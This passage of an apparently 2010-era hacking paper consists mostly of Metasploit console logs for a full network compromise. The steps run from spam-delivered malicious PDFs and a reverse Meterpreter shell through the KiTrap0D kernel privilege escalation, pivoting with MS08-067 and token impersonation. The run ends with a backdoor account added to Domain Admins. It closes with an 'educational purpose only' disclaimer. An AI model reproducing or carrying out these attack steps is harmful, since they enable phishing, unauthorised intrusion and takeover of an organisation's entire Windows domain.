	msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
	SQL => select * from user_role_privs
	msf auxiliary(oracle_sql) > run

	[*] Sending SQL...
	[*] SCOTT,CONNECT,NO,YES,NO
	[*] SCOTT,DBA,NO,YES,NO
	[*] SCOTT,JAVASYSPRIV,NO,YES,NO
	[*] SCOTT,RESOURCE,NO,YES,NO
	[*] Done...
	[*] Auxiliary module execution completed

	[End Result]----------------------------------------------------------------------------

		Use 'admin/oracle/post_exploitation/win32exec' to send command execution on victim system.

	[MSF Result]----------------------------------------------------------------------------

	msf > use admin/oracle/post_exploitation/win32exec
	msf auxiliary(win32exec) > set CMD "net user zeq3ul 5plus4=10 /add && net localgroup administrators zeq3ul /add"
	CMD => net user zeq3ul 5plus4=10 /add && net localgroup administrators zeq3ul /add
	msf auxiliary(oracle_win32) > set SID RD.ORA
	SID => RD.ORA
	msf auxiliary(oracle_win32) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf auxiliary(oracle_win32) > run
	
	[*] Creating MSF JAVA class...
	[*] Done...
	[*] Creating MSF procedure...
	[*] Done...
	[*] Sending command: 'net user zeq3ul 5plus4=10 /add && net localgroup administrators zeq3ul /add'
	[*] Done...
	[*] Auxiliary module execution completed
	
	[End Result]----------------------------------------------------------------------------

		Next step to full compromise system with PSEXEC and METERPRETER Payload

	[MSF Result]----------------------------------------------------------------------------

	msf > use windows/smb/psexec
	msf exploit(psexec) > set RHOST 192.168.163.140
	RHOST => 192.168.163.140
	msf exploit(psexec) > set SMBUser zeq3ul
	SMBUser => zeq3ul
	msf exploit(psexec) > set SMBPass 5plus4=10
	SMBPass => 5plus4=10
	msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
	PAYLOAD => windows/meterpreter/reverse_tcp
	msf exploit(psexec) > set LHOST 192.168.163.137
	LHOST => 192.168.163.137
	msf exploit(psexec) > exploit
	
	[*] Connecting to the server...
	[*] Started reverse handler on port 4444
	[*] Authenticating as user 'zeq3ul'...
	[*] Uploading payload...
	[*] Created \mFfFcDAj.exe...
	[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.163.140[\svcctl] ...
	[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.163.140[\svcctl] ...
	[*] Obtaining a service manager handle...
	[*] Creating a new service (mPJJxvtC - "MHMAPTlybviISxdBueIVtLYOTcL")...
	[*] Closing service handle...
	[*] Opening service...
	[*] Starting the service...
	[*] Removing the service...
	[*] Closing service handle...
	[*] Deleting \mFfFcDAj.exe...
	[*] Sending stage (723456 bytes)
	[*] Meterpreter session 1 opened (192.168.163.137:4444 -> 192.168.163.140:1633)
	
	meterpreter > getuid
	Server username: NT AUTHORITY\SYSTEM
	
	[End Result]----------------------------------------------------------------------------
	
	

###############################	
 [0x03] - Operation CloudBurst
###############################
	
		Metasploit is a tool for exploiting system and software vulnerabilities.A new day has come with new software vulnerabilities such as "Operation Aurora" That attack IE that I hope to affect IE8 	(Bypass DEP+ASLR) soon ;) , Adobe Reader/Flash, Microsoft Office (Evil Macro), Java Applet, Cross Site Scripting, etc.
		
		New Trend for attack is Attack Layer 8 - Client Side Exploit. So This chapter we will point to attack "From Slave to God" that start with Client Side exploit to compromise intranet victim's 		network then exploit system by "The Art of Grey-Box Attack" papers. Before begin the operation, we must prepared technic for the Battle.

		
		<< KiTrap0D >> Exploit for All Windows versions, Local Ring0 Kernel Exploit
		
		All 32bit x86 versions of Windows NT released since 27-Jul-1993 are believed to
		be affected, including but not limited to the following actively supported
		versions:

			- Windows 2000
			- Windows XP
			- Windows Server 2003
			- Windows Vista
			- Windows Server 2008
			- Windows 7
			- etc.
		
		Kitrap0D were combine into Metasploit Framework Meterpreter ;) You must SVN update metasploit to the latest exploit too for get it.
		
		
		This Operation, we send Many SPAM Mail to victim's mail then waiting for connection. We used Adobe JBIG2Decode Vulnerability that affect Adobe Reader 8/9 (Most people didn't update software) So 	when we compromised, We will attack domain controller. Now we compromised 1 machine that join domain controller and have NT/SYSTEM privilege on localmachine but we want more !!!. This step show How to 	Using "Impersonate Token" Domain admins group and Full compromise Domain Controller and all windows system that joined domain.  
	
	
	:MISSION:

			     SPAM Mails
	1.	Zea3ul ---------------------> Victim@abc.com (Open PDF and Reverse Shell back to Zeq3ul)
	 	  ^				   |
	  	  |				   |
	    	  \--------------------------------/
	              Reverse Meterpreter Shell			

	2.	Zeq3ul Get Meterpreter shell with USER's Priv, Then Exploit Local kernel with KiTrap0D to SYSTEM's Priv.
	3.      Zeq3ul Can full compromise victim system, Then Pivot Network and Attack other machine that joined Domain Controller
	4.	Compromise Domain Controller and all systems. Victory !!!



	[MSF Result]---------------------------------------------------------------------------------
	
	bt framework3 # msfconsole
	____________
	< metasploit >
 	------------
       		\   ,__,
        	 \  (oo)____
           	    (__)    )\
              	       ||--|| *


       		=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
		+ -- --=[ 490 exploits - 226 auxiliary
		+ -- --=[ 192 payloads - 23 encoders - 8 nops
       		=[ svn r8091 updated 39 days ago (2010.01.09)

	 Warning: This copy of the Metasploit Framework was last updated 39 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:
             http://www.metasploit.com/redmine/projects/framework/wiki/Updating
                                      	
	msf > use windows/fileformat/adobe_jbig2decode
	msf exploit(adobe_jbig2decode) > set TARGET 0
	TARGET => 0
	msf exploit(adobe_jbig2decode) > set FILENAME malfile.pdf
	FILENAME => malfile.pdf
	msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
	PAYLOAD => windows/meterpreter/reverse_tcp
	msf exploit(adobe_jbig2decode) > set LHOST 192.168.80.131
	LHOST => 192.168.80.131
	msf exploit(adobe_jbig2decode) > exploit

	[*] Handler binding to LHOST 0.0.0.0
	[*] Started reverse handler
	[*] Creating 'malfile.pdf' file...
	[*] Generated output file /pentest/exploits/framework3/data/exploits/malfile.pdf
	[*] Exploit completed, but no session was created.
	msf exploit(adobe_jbig2decode) > back

	msf > use exploit/multi/handler
	msf exploit(handler) > set LHOST 192.168.163.137
	LHOST => 192.168.163.137
	msf exploit(handler) > set LPORT 4444
	LPORT => 4444
	msf exploit(handler) > exploit -j
	[*] Exploit running as background job.
	msf exploit(handler) >
	[*] Starting the payload handler...
	[*] Started reverse handler on port 4444
	[*] Sending stage (723456 bytes)
	[*] Meterpreter session 1 opened (192.168.163.137:4444 -> 192.168.163.133:1156)
	msf exploit(hanler) > sessions -l
	
	Active sessions
	===============
	
  	Id  Description  Tunnel
  	--  -----------  ------
 	 1   Meterpreter  192.168.163.137:4444 -> 192.168.163.133:1156

	msf exploit(handler) > session -i 1
	[*] Starting interaction with 1...
	
	meterpreter > getuid
	Server username: WINXP\cwh

	meterpreter > use priv
	Loading extension priv...success.

	meterpreter > run kitrap0d
	[*] Currently running as WINXP\cwh

	[*] Loading the vdmallowed executable and DLL from the local system...
	[*] Uploading vdmallowed to C:\DOCUME~1\cwh\LOCALS~1\Temp\kaZZPD.exe...
	[*] Uploading vdmallowed to C:\DOCUME~1\cwh\LOCALS~1\Temp\vdmexploit.dll...
	[*] Escalating our process (PID:3248)...

	--------------------------------------------------
	Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
	-------------------------------------------- taviso@sdf.lonestar.org ---


	[?] GetVersionEx() => 5.1
	[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
	[?] Searching for kernel 5.1 signature: version 2...
	[+] Trying signature with index 3
	[+] Signature found 0x288de bytes from kernel base
	[+] Starting the NTVDM subsystem by launching MS-DOS executable
	[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 1204
	[?] OpenProcess(1204) => 0x7e8
	[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
	[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
	[?] WaitForSingleObject(0x7d4, INFINITE);
	[?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074
	[+] The exploit thread reports exploitation was successful
	[+] w00t! You can now use the shell opened earlier

	[*] Deleting files...
	[*] Now running as NT AUTHORITY\SYSTEM
	
	meterpreter > getuid
	Server username: NT AUTHORITY\SYSTEM
	meterpreter > exit



	meterpreter > route
	
	Network routes
	==============
	
    	Subnet           Netmask          Gateway
   	 ------           -------          -------
    	0.0.0.0          0.0.0.0          192.211.163.2
    	127.0.0.0        255.0.0.0        127.0.0.1
    	192.211.163.0    255.255.255.0    192.211.163.133
    	192.211.163.133  255.255.255.255  127.0.0.1
    	192.211.163.255  255.255.255.255  192.211.163.133
    	224.0.0.0        240.0.0.0        192.211.163.133
    	255.255.255.255  255.255.255.255  192.211.163.133
	
	meterpreter >
	Background session 1? [y/N]y
	
	msf exploit(handler) > route add 192.211.163.0 255.255.255.0 1
	msf exploit(handler) > route print
	
	Active Routing Table
	====================

 	  Subnet             Netmask            Gateway   
 	  ------             -------            -------   
 	  192.211.163.0        255.255.255.0      Session 1 
	
	msf exploit(handler) > use windows/smb/ms08_067_netapi
	msf exploit(ms08_067_netapi) > set PAYLOAD windows/patchupmeterpreter/reverse_tcp
	PAYLOAD => windows/patchupmeterpreter/reverse_tcp
	msf exploit(ms08_067_netapi) > show options
	
	Module options:
	
	   Name     Current Setting  Required  Description                            
	   ----     ---------------  --------  -----------                            
	   RHOST                     yes       The target address                     
	   RPORT    445              yes       Set the SMB service port               
	   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC) 
	
	Payload options (windows/patchupmeterpreter/reverse_tcp):
	
	   Name      Current Setting  Required  Description                          
	   ----      ---------------  --------  -----------                          
	   EXITFUNC  thread           yes       Exit technique: seh, thread, process 
	   LHOST                      yes       The local address                    
	   LPORT     4444             yes       The local port                       

	Exploit target:

	   Id  Name                
	   --  ----                
	   0   Automatic Targeting 
	
	msf exploit(ms08_067_netapi) > set RHOST 192.211.163.140
	RHOST => 10.211.55.128
	msf exploit(ms08_067_netapi) > set LPORT 5000
	LPORT => 5000
	msf exploit(ms08_067_netapi) > set LHOST 192.168.163.137
	LHOST => 10.10.1.109
	msf exploit(ms08_067_netapi) > exploit

	[*] Handler binding to LHOST 0.0.0.0
	[*] Started reverse handler
	[*] Automatically detecting the target...
	[[*] Fingerprint: Windows XP Service Pack 2 - lang:English
	[*] Selected Target: Windows XP SP2 English (NX)
	[*] Triggering the vulnerability...
	[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
	[*] Sending stage (2650 bytes)
	[*] Sleeping before handling stage...
	[*] Uploading DLL (205835 bytes)...
	[*] Upload completed.
	[*] Meterpreter session 2 opened (192.168.163.137:5000 -> 192.168.163.133:1233)

	meterpreter >
	Background session 2? [y/N]y
	
	msf exploit(ms08_067_netapi) > sessions -l

	Active sessions
	===============
	
	  Id  Description  Tunnel                                
	  --  -----------  ------                                
	  1   Meterpreter  192.168.163.137:4444 -> 192.168.163.133:1156 
	  1   Meterpreter  192.168.163.137:5000 -> 192.168.163.133:1233  

	//We used PIVOT Technique to cross around network and successfully routed our exploit to the 192.211.163.0/24 network,successfully compromised hosts inside the normally non-routable network!
	//If you notice it says that 192.168.163.137 is connected to 192.168.163.133, note that we did a reverse payload and that 192.168.163.133 is the external IP address. The 192.211.163.133 and 192.211.163.140 are NATed behind the router 192.168.163.133
		
	//Let's Compromise Domain Controller.
	
	msf exploit(ms08_067_netapi) > sessions -i 2
	[*] Starting interaction with 2...	

	meterpreter > shell
	Process 15484 created.
	Channel 1 created.
	Micorsoft Windows XP [Version 5.1.2600]
	(C) Copyright 1985-2001 Microsoft Corp.
	
	C:\WINDOWS\system32>net user
	net user
	
	User accounts for \\
	
	-------------------------------------------------------------------------------
	abcxyz                   admin                  Administrator
	ASPNET                   csadmin                Guest
	IUSR_HDB1                IWAM_HDB1              SUPPORT_388945a0
	The command completed with one or more errors.

	
	C:\WINDOWS\system32>net group "domain admins" /domain
	net group "domain admins" /domain
	The request will be processed at a domain controller for domain clqa.loc.

	Group name     Domain Admins
	Comment        Designated administrators of the domain
	
	Members

	-------------------------------------------------------------------------------
	Adit.Pr                  Administrator            Chal.Ar
	Chal.Are           	 john.sm                  Kai.om
	kitti.admin              pom.sri                  
	The command completed successfully.

	
	C:\WINDOWS\system32>exit

	
	meterpreter > use incognito
	Loading extension incognito...success.
	meterpreter > list_tokens -u

	Delegation Tokens Available
	========================================
	CLQA\CLESB.Service
	CLQA\RS.service
	NT AUTHORITY\LOCAL SERVICE
	NT AUTHORITY\NETWORK SERVICE
	NT AUTHORITY\SYSTEM
	
	Impersonation Tokens Available
	========================================
	CLQA\pom.sri
	CLQA\john.sm
	NT AUTHORITY\ANONYMOUS LOGON
	
	meterpreter > impersonate_token CLQA\\pom.sri
	[-] No delegation token available
	[+] Successfully impersonated user CLQA\pom.sri
	meterpreter > getuid
	Server username: CLQA\pom.sri
	meterpreter > execute -i -f cmd.exe -t
	Process 14992 created.
	Channel 2 created.
	Microsoft Windows [Version 5.2.3790]
	(C) Copyright 1985-2003 Microsoft Corp.
	
	C:\WINDOWS\system32>whoami
	whoami
	clqa\pom.sri
	
	
	C:\WINDOWS\system32>net user zeq3ul 5plus4=10 /add /domain
	net user zeq3ul 5plus4=10 /add /domain
	The request will be processed at a domain controller for domain clqa.loc.
	
	The command completed successfully.


	C:\WINDOWS\system32>net group "domain admins" zeq3ul /add /domain
	net group "domain admins" zeq3ul /add /domain
	The request will be processed at a domain controller for domain clqa.loc.

	The command completed successfully.
	
	
	C:\WINDOWS\system32>net group "domain admins" /domain
	net group "domain admins" /domain
	The request will be processed at a domain controller for domain clqa.loc.
	
	Group name     Domain Admins
	Comment        Designated administrators of the domain
	
	Members
	
	-------------------------------------------------------------------------------
	Adit.Pr                  Administrator            Chal.Ar
	Chal.Are           	 john.sm                  Kai.om
	kitti.admin              pom.sri                  zeq3ul
	The command completed successfully.
	
	C:\WINDOWS\system32>exit
		
		
	[End Result]------------------------------------------------------------------------------------

		From Result, We can conclude that We must compromise only 1 machine that joined domain then impersonate token to "Domain admins", Add user and Escalate Privilege our user (zeq3ul) to 
	"Domain admins" group. Now we compromise all system that joined Domain controller. Mission Accomplished !!!!



#####################
 [0x04] - References
#####################

[1] Zero Cold@intern0t.net
[2] http://carnal0wnage.attackresearch.com
[3] http://blog.metasploit.com/
[4] Metasploit Unleashed
[5] Full Scope Security Attacking Layer 8


####################
 [0x05] - Greetz To
####################
	
Greetz	    : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, exploit-db.com

				----------------------------------------------------
	This paper is written for Educational purpose only. The authors are not responsible for any damage 
 originating from using this paper in wrong objective. If you want to use this knowledge with other person systems, 
				you must request for consent from system owner before
				----------------------------------------------------